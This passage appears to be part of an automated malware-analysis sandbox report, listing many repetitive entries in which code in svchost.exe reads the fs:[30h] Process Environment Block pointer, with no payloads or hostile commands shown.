                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A720F0 mov ecx, dword ptr fs:[00000030h]4_2_03A720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB20DE mov eax, dword ptr fs:[00000030h]4_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A020 mov eax, dword ptr fs:[00000030h]4_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2C020 mov eax, dword ptr fs:[00000030h]4_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC6030 mov eax, dword ptr fs:[00000030h]4_2_03AC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4000 mov ecx, dword ptr fs:[00000030h]4_2_03AB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E016 mov eax, dword ptr fs:[00000030h]4_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E016 mov eax, dword ptr fs:[00000030h]4_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E016 mov eax, dword ptr fs:[00000030h]4_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E016 mov eax, dword ptr fs:[00000030h]4_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5C073 mov eax, dword ptr fs:[00000030h]4_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32050 mov eax, dword ptr fs:[00000030h]4_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6050 mov eax, dword ptr fs:[00000030h]4_2_03AB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A307AF mov eax, dword ptr fs:[00000030h]4_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD678E mov eax, dword ptr fs:[00000030h]4_2_03AD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A527ED mov eax, dword ptr fs:[00000030h]4_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A527ED mov eax, dword ptr fs:[00000030h]4_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A527ED mov eax, dword ptr fs:[00000030h]4_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]4_2_03ABE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A347FB mov eax, dword ptr fs:[00000030h]4_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A347FB mov eax, dword ptr fs:[00000030h]4_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]4_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB07C3 mov eax, dword ptr fs:[00000030h]4_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C720 mov eax, dword ptr fs:[00000030h]4_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C720 mov eax, dword ptr fs:[00000030h]4_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6273C mov eax, dword ptr fs:[00000030h]4_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6273C mov ecx, dword ptr fs:[00000030h]4_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6273C mov eax, dword ptr fs:[00000030h]4_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAC730 mov eax, dword ptr fs:[00000030h]4_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C700 mov eax, dword ptr fs:[00000030h]4_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30710 mov eax, dword ptr fs:[00000030h]4_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A60710 mov eax, dword ptr fs:[00000030h]4_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38770 mov eax, dword ptr fs:[00000030h]4_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6674D mov esi, dword ptr fs:[00000030h]4_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6674D mov eax, dword ptr fs:[00000030h]4_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6674D mov eax, dword ptr fs:[00000030h]4_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30750 mov eax, dword ptr fs:[00000030h]4_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABE75D mov eax, dword ptr fs:[00000030h]4_2_03ABE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72750 mov eax, dword ptr fs:[00000030h]4_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72750 mov eax, dword ptr fs:[00000030h]4_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4755 mov eax, dword ptr fs:[00000030h]4_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]4_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A666B0 mov eax, dword ptr fs:[00000030h]4_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34690 mov eax, dword ptr fs:[00000030h]4_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34690 mov eax, dword ptr fs:[00000030h]4_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB06F1 mov eax, dword ptr fs:[00000030h]4_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB06F1 mov eax, dword ptr fs:[00000030h]4_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]4_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]4_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E627 mov eax, dword ptr fs:[00000030h]4_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A66620 mov eax, dword ptr fs:[00000030h]4_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A68620 mov eax, dword ptr fs:[00000030h]4_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3262C mov eax, dword ptr fs:[00000030h]4_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE609 mov eax, dword ptr fs:[00000030h]4_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72619 mov eax, dword ptr fs:[00000030h]4_2_03A72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF866E mov eax, dword ptr fs:[00000030h]4_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF866E mov eax, dword ptr fs:[00000030h]4_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A660 mov eax, dword ptr fs:[00000030h]4_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A660 mov eax, dword ptr fs:[00000030h]4_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A62674 mov eax, dword ptr fs:[00000030h]4_2_03A62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4C640 mov eax, dword ptr fs:[00000030h]4_2_03A4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB05A7 mov eax, dword ptr fs:[00000030h]4_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB05A7 mov eax, dword ptr fs:[00000030h]4_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB05A7 mov eax, dword ptr fs:[00000030h]4_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A545B1 mov eax, dword ptr fs:[00000030h]4_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A545B1 mov eax, dword ptr fs:[00000030h]4_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32582 mov eax, dword ptr fs:[00000030h]4_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32582 mov ecx, dword ptr fs:[00000030h]4_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A64588 mov eax, dword ptr fs:[00000030h]4_2_03A64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E59C mov eax, dword ptr fs:[00000030h]4_2_03A6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A325E0 mov eax, dword ptr fs:[00000030h]4_2_03A325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C5ED mov eax, dword ptr fs:[00000030h]4_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C5ED mov eax, dword ptr fs:[00000030h]4_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E5CF mov eax, dword ptr fs:[00000030h]4_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E5CF mov eax, dword ptr fs:[00000030h]4_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A365D0 mov eax, dword ptr fs:[00000030h]4_2_03A365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]4_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]4_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]4_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]4_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]4_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]4_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]4_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC6500 mov eax, dword ptr fs:[00000030h]4_2_03AC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]4_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]4_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]4_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]4_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]4_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]4_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]4_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6656A mov eax, dword ptr fs:[00000030h]4_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6656A mov eax, dword ptr fs:[00000030h]4_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6656A mov eax, dword ptr fs:[00000030h]4_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38550 mov eax, dword ptr fs:[00000030h]4_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38550 mov eax, dword ptr fs:[00000030h]4_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A364AB mov eax, dword ptr fs:[00000030h]4_2_03A364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A644B0 mov ecx, dword ptr fs:[00000030h]4_2_03A644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]4_2_03ABA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A304E5 mov ecx, dword ptr fs:[00000030h]4_2_03A304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2E420 mov eax, dword ptr fs:[00000030h]4_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2E420 mov eax, dword ptr fs:[00000030h]4_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2E420 mov eax, dword ptr fs:[00000030h]4_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2C427 mov eax, dword ptr fs:[00000030h]4_2_03A2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]4_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]4_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]4_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]4_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]4_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]4_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]4_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A430 mov eax, dword ptr fs:[00000030h]4_2_03A6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A68402 mov eax, dword ptr fs:[00000030h]4_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A68402 mov eax, dword ptr fs:[00000030h]4_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A68402 mov eax, dword ptr fs:[00000030h]4_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABC460 mov ecx, dword ptr fs:[00000030h]4_2_03ABC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5A470 mov eax, dword ptr fs:[00000030h]4_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5A470 mov eax, dword ptr fs:[00000030h]4_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5A470 mov eax, dword ptr fs:[00000030h]4_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]4_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]4_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]4_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]4_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]4_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]4_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]4_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]4_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2645D mov eax, dword ptr fs:[00000030h]4_2_03A2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5245A mov eax, dword ptr fs:[00000030h]4_2_03A5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40BBE mov eax, dword ptr fs:[00000030h]4_2_03A40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40BBE mov eax, dword ptr fs:[00000030h]4_2_03A40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38BF0 mov eax, dword ptr fs:[00000030h]4_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38BF0 mov eax, dword ptr fs:[00000030h]4_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38BF0 mov eax, dword ptr fs:[00000030h]4_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5EBFC mov eax, dword ptr fs:[00000030h]4_2_03A5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]4_2_03ABCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A50BCB mov eax, dword ptr fs:[00000030h]4_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A50BCB mov eax, dword ptr fs:[00000030h]4_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A50BCB mov eax, dword ptr fs:[00000030h]4_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30BCD mov eax, dword ptr fs:[00000030h]4_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30BCD mov eax, dword ptr fs:[00000030h]4_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30BCD mov eax, dword ptr fs:[00000030h]4_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]4_2_03ADEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5EB20 mov eax, dword ptr fs:[00000030h]4_2_03A5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5EB20 mov eax, dword ptr fs:[00000030h]4_2_03A5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF8B28 mov eax, dword ptr fs:[00000030h]4_2_03AF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF8B28 mov eax, dword ptr fs:[00000030h]4_2_03AF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]4_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2CB7E mov eax, dword ptr fs:[00000030h]4_2_03A2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC6B40 mov eax, dword ptr fs:[00000030h]4_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC6B40 mov eax, dword ptr fs:[00000030h]4_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFAB40 mov eax, dword ptr fs:[00000030h]4_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD8B42 mov eax, dword ptr fs:[00000030h]4_2_03AD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38AA0 mov eax, dword ptr fs:[00000030h]4_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38AA0 mov eax, dword ptr fs:[00000030h]4_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A86AA4 mov eax, dword ptr fs:[00000030h]4_2_03A86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04A80 mov eax, dword ptr fs:[00000030h]4_2_03B04A80
